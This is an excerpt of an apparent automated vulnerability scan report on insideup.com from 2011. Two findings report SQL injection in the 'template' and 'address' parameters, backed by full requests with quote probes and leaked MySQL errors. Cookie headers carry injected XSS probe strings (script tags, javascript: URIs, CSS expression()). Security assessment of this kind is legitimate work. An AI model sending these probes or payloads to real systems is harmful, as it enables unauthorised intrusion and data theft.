OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:29:10 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=6msq6fmmqloegj2hk69urd7nt3; path=/
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8

Too many connections

1.209. http://www.insideup.com/ppc/leadflow/cace00/project_dynamic_page_updated.php [template parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/cace00/project_dynamic_page_updated.php

Issue detail

The template parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the template parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

POST /ppc/leadflow/cace00/project_dynamic_page_updated.php?catId=80007&group=cace00&template=3' HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 482

subcategoryId=80007&catId=80007&iusrc=iupsc+&attributeId_393[]=1937__Other&attributeId_508[]=3317__+Other&attributeId_394=1945__20%2c000%2b&attributeId_395=1950__More+than+two+months&attributeId_396=1
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:30:45 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=b5f4rn66vertogg2mno1ffu895; path=/
Content-Length: 2486
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
leadflow/cace00/project_dynamic_page_updated.php?catId=80007&group=cace00&template=3'' OR prj.project_page_url = 'leadflow/cace00/project_dynamic_page_updated.php?catId=80007&group=cace00&template=3'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/cace00/project_dynamic_page_updated.php?catId=80007&group=cace00&templa' at line 5

Request 2

POST /ppc/leadflow/cace00/project_dynamic_page_updated.php?catId=80007&group=cace00&template=3'' HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 482

subcategoryId=80007&catId=80007&iusrc=iupsc+&attributeId_393[]=1937__Other&attributeId_508[]=3317__+Other&attributeId_394=1945__20%2c000%2b&attributeId_395=1950__More+than+two+months&attributeId_396=1
...[SNIP]...

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 06:30:46 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=v7v64b8teb7k1nn7feb00ahiu1; path=/
Content-Length: 127
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/cace00/project_dynamic_page_updated.php was not found on this server.</p>

1.210. http://www.insideup.com/ppc/leadflow/deco00/project.php [address parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/deco00/project.php

Issue detail

The address parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the address parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc&address=Address'&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_387=1892__Collect+from+businesses+only&attributeId_388=1896__%24500+-+1%2c000&attributeId_389=1905__1&attributeId_390=1912__Less+than+2+months&attributeId_391=1919__This+is+the+first+time&attributeId_392=1924__Yes&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30009&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:52:37 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=j63gma9m7f3up6jf8l7tr103d0; path=/
Content-Length: 6334
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
is the first time&attributeId_392=1924__Yes&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30009&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'from businesses only&attributeId_388=1896__$500 - 1,000&attributeId_389=1905__1&' at line 5

Request 2

GET /ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc&address=Address''&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_387=1892__Collect+from+businesses+only&attributeId_388=1896__%24500+-+1%2c000&attributeId_389=1905__1&attributeId_390=1912__Less+than+2+months&attributeId_391=1919__This+is+the+first+time&attributeId_392=1924__Yes&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30009&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 